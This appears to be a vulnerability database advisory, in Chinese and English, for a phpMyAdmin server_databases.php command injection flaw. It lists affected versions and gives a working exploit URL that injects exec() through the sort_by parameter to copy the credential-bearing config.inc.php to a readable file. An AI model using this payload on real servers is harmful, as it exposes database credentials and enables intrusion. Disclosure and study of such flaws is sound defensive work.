phpMyAdmin <= 3.2 - 'server_databases.php' Remote Command Execution Vulnerability

2014-07-01T00:00:00
ID SSV:85670
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

phpMyAdmin 'server_databases.php' 远程命令执行漏洞

受影响的系统

Typo3 phpMyAdmin 3.2

Typo3 phpMyAdmin 3.0.1

Typo3 phpMyAdmin 3.0

Typo3 phpMyAdmin 0.2.2

Turbolinux Appliance Server 3.0 x64

Turbolinux Appliance Server 3.0

SuSE openSUSE 10.3

S.u.S.E. openSUSE 11.1

S.u.S.E. openSUSE 11.0

phpMyAdmin phpMyAdmin 2.11.9

phpMyAdmin phpMyAdmin 2.11.8

phpMyAdmin phpMyAdmin 2.11.7

phpMyAdmin phpMyAdmin 2.11.5

phpMyAdmin phpMyAdmin 2.11.4

phpMyAdmin phpMyAdmin 2.11.1

phpMyAdmin phpMyAdmin 2.9.1

phpMyAdmin phpMyAdmin 2.9.2-rc1

phpMyAdmin phpMyAdmin 2.9.1.1

phpMyAdmin phpMyAdmin 2.11.8.1

phpMyAdmin phpMyAdmin 2.11.5.2

phpMyAdmin phpMyAdmin 2.11.5.1

phpMyAdmin phpMyAdmin 2.11.2.2

phpMyAdmin phpMyAdmin 2.11.2.1

phpMyAdmin phpMyAdmin 2.11.1.2

phpMyAdmin phpMyAdmin 2.11.1.1

phpMyAdmin phpMyAdmin 2.10.0.2

phpMyAdmin phpMyAdmin 2.10.0.1

MandrakeSoft Corporate Server 4.0 x86_64

MandrakeSoft Corporate Server 4.0

Gentoo Linux

Debian Linux 4.0 sparc

Debian Linux 4.0 s/390

Debian Linux 4.0 powerpc

Debian Linux 4.0 mipsel

Debian Linux 4.0 mips

Debian Linux 4.0 m68k

Debian Linux 4.0 ia-64

Debian Linux 4.0 ia-32

Debian Linux 4.0 hppa

Debian Linux 4.0 arm

Debian Linux 4.0 amd64

Debian Linux 4.0 alpha

Debian Linux 4.0

漏洞成因:

没有过滤用户的输入,导致黑客可以攻击受影响的组件甚至电脑

exp:

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]

                                        
                                            
                                                source: http://www.securityfocus.com/bid/31188/info

phpMyAdmin is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the application fails to adequately sanitize user-supplied input.

Successful attacks can compromise the affected application and possibly the underlying computer.

This issue affects versions prior to phpMyAdmin 2.11.9.1.

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]